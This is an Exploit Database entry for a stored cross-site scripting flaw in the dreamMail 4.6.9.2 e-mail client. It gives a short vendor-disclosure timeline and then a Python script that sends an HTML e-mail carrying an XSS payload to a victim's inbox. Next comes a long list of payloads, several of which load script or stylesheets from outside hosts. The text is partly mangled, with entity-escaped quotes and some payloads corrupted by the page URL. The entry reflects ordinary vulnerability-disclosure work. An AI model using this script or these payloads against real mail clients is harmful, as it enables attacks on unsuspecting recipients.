dreamMail e-mail client 4.6.9.2 – Persistent Cross-Site Scripting

• Exploit Database
• 161 阅读

• 作者： loneferret
  日期： 2013-08-23
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/27805/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193

  #!/usr/bin/python &apos;&apos;&apos;   Author: loneferret of Offensive Security Product: dreamMail e-mail client Version: 4.6.9.2 Vendor Site: http://www.dreammail.eu Software Download: http://www.dreammail.eu/intl/en/download.html   Tested on: Windows XP SP3 Eng. Tested on: Windows 7 Pro SP1 Eng. dreamMail: Using default settings     E-mail client is vulnerable to stored XSS. Either opening or viewing the e-mail and you get an annoying alert box etc etc etc. Injection Point: Body Gave vendor 7 days to reply in order to co-ordinate a release date. Timeline: 16 Aug 2013: Tentative release date 23 Aug 2013 16 Aug 2013: Vulnerability reported to vendor. Provided complete list of payloads. 19 Aug 2013: Still no response. Sent second e-mail. 22 Aug 2013: Got a reply but not from development guy. He seems MIA according to contact. No longer supported due to missing development guy. 23 Aug 2013: Still nothing. 24 Aug 2013: Release   &apos;&apos;&apos;   import smtplib, urllib2   payload = &apos;&apos;&apos;<IMG SRC=&apos;vbscript:msgbox("XSS")&apos;>&apos;&apos;&apos;   def sendMail(dstemail, frmemail, smtpsrv, username, password): msg= "From: hacker@offsec.local\n" msg += "To: victim@offsec.local\n" msg += &apos;Date: Today\r\n&apos; msg += "Subject: XSS payload\n" msg += "Content-type: text/html\n\n" msg += payload + "\r\n\r\n" server = smtplib.SMTP(smtpsrv) server.login(username,password) try: server.sendmail(frmemail, dstemail, msg) except Exception, e: print "[-] Failed to send email:" print "[*] " + str(e) server.quit()   username = "acker@offsec.local" password = "123456" dstemail = "victim@offsec.local" frmemail = "acker@offsec.local" smtpsrv= "xxx.xxx.xxx.xxx"   print "[*] Sending Email" sendMail(dstemail, frmemail, smtpsrv, username, password)   &apos;&apos;&apos; List of XSS types and different syntaxes to which the client is vulnerable. Each payload will pop a message box, usually with the message "XSS" inside.     Paylaod-: &apos;;alert(String.fromCharCode(88,83,83))//\&apos;;alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">&apos;><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}   Paylaod-: <SCRIPT SRC=http://server/xss.js></SCRIPT>   Paylaod-: <SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>   Paylaod-: <BODY BACKGROUND="javascript:alert(&apos;XSS&apos;);">   Paylaod-: <BODY ONLOAD=alert(&apos;XSS&apos;)>   Paylaod-: <DIV STYLE="background-image: url(javascript:alert(&apos;XSS&apos;))">   Paylaod-: <DIV STYLE="background-image: url(&#1;javascript:alert(&apos;XSS&apos;))">   Paylaod-: <DIV STYLE="width: expression(alert(&apos;XSS&apos;));">   Paylaod-: <IFRAME SRC="javascript:alert(&apos;XSS&apos;);"></IFRAME>   Paylaod-: <INPUT TYPE="IMAGE" SRC="javascript:alert(&apos;XSS&apos;);">   Paylaod-: <IMG SRC="javascript:alert(&apos;XSS&apos;);">   Paylaod-: <IMG SRC=javascript:alert(&apos;XSS&apos;)>   Paylaod-: <IMG DYNSRC="javascript:alert(&apos;XSS&apos;);">   Paylaod-: <IMG LOWSRC="javascript:alert(&apos;XSS&apos;);">Paylaod-: 21exp/*<XSS STYLE=&apos;no\xss:noxss("*//*"); xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))&apos;>   Paylaod-: <STYLE>li {list-style-image: url("javascript:alert(&apos;XSS&apos;)");}</STYLE><UL><LI>XSS   Paylaod-: <IMG SRC=&apos;vbscript:msgbox("XSS")&apos;>   Paylaod-: <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert(&apos;XSS&apos;)></OBJECT>   Paylaod-: <IMG STYLE="xss:expr/*XSS*/ession(alert(&apos;XSS&apos;))">   Paylaod-: <XSS STYLE="xss:expression(alert(&apos;XSS&apos;))">   Paylaod-: <STYLE>.XSS{background-image:url("javascript:alert(&apos;XSS&apos;)");}</STYLE><A CLASS=XSS></A>   Paylaod-: <STYLE type="text/css">BODY{background:url("javascript:alert(&apos;XSS&apos;)")}</STYLE>   Paylaod-: <LINK REL="stylesheet" HREF="javascript:alert(&apos;XSS&apos;);">   Paylaod-: <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">   Paylaod-: <STYLE>@import&apos;http://ha.ckers.org/xss.css&apos;;</STYLE>   Paylaod-: <TABLE BACKGROUND="javascript:alert(&apos;XSS&apos;)"></TABLE>   Paylaod-: <TABLE><TD BACKGROUND="javascript:alert(&apos;XSS&apos;)"></TD></TABLE>   Paylaod-: <XML ID=I><X><C><![CDATA[<IMG SRC="https://www.exploit-db.com/exploits/27805/javas]]><![CDATA[cript:alert(&apos;XSS&apos;);">]]> </C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>   Paylaod-: <XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>   Paylaod-: <HTML><BODY> <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"> <?import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert(&apos;XSS&apos;)</SCRIPT>"> </BODY></HTML>   Paylaod-: <!--[if gte IE 4]> <SCRIPT>alert(&apos;XSS&apos;);</SCRIPT> <![endif]-->   Paylaod-: <SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>   Paylaod-: <IMG SRC=JaVaScRiPt:alert(&apos;XSS&apos;)>   Paylaod-: <IMG SRC=javascript:alert("XSS")>   Paylaod-: <IMG SRC=<code>javascript:alert("We says, &apos;XSS&apos;")</code>>   Paylaod-: <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>   Paylaod-: <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>   Paylaod-: <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>   Paylaod-: <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>   Paylaod-: <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert(&apos;XSS&apos;);+ADw-/SCRIPT+AD4-   Paylaod-: </TITLE><SCRIPT>alert("XSS");</SCRIPT>   Paylaod-: <STYLE>@im\port&apos;\ja\vasc\ript:alert("XSS")&apos;;</STYLE>   Paylaod-: <IMG SRC="https://www.exploit-db.com/exploits/27805/jav ascript:alert(&apos;XSS&apos;);">   Paylaod-: <IMG SRC="https://www.exploit-db.com/exploits/27805/jav&#x09;ascript:alert(&apos;XSS&apos;);">   Paylaod-: <IMG SRC="https://www.exploit-db.com/exploits/27805/jav&#x0A;ascript:alert(&apos;XSS&apos;);">   Paylaod-: <IMG SRC="https://www.exploit-db.com/exploits/27805/jav&#x0D;ascript:alert(&apos;XSS&apos;);">   Paylaod-: <IMG SRC="https://www.exploit-db.com/exploits/27805/ &#14;javascript:alert(&apos;XSS&apos;);">   Paylaod-: <SCRIPT/XSS SRC="http://server/xss.js"></SCRIPT>   Paylaod-: <SCRIPT SRC=http://server/xss.js   Paylaod-: <IMG SRC="javascript:alert(&apos;XSS&apos;)"   Paylaod-: <<SCRIPT>alert("XSS");//<</SCRIPT>   Paylaod-: <IMG """><SCRIPT>alert("XSS")</SCRIPT>">   Paylaod-: <SCRIPT>a=/XSS/ alert(a.source)</SCRIPT>   Paylaod-: <SCRIPT a=">" SRC="http://server/xss.js"></SCRIPT>   Paylaod-: <SCRIPT ="blah" SRC="http://server/xss.js"></SCRIPT>   Paylaod-: <SCRIPT a="blah" &apos;&apos; SRC="http://server/xss.js"></SCRIPT>   Paylaod-: <SCRIPT "a=&apos;>&apos;" SRC="http://server/xss.js"></SCRIPT>   Paylaod-: <SCRIPT a=<code>></code> SRC="http://server/xss.js"></SCRIPT>   Paylaod-: <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://server/xss.js"></SCRIPT>   Paylaod-: <SCRIPT a=">&apos;>" SRC="http://server/xss.js"></SCRIPT>   &apos;&apos;&apos;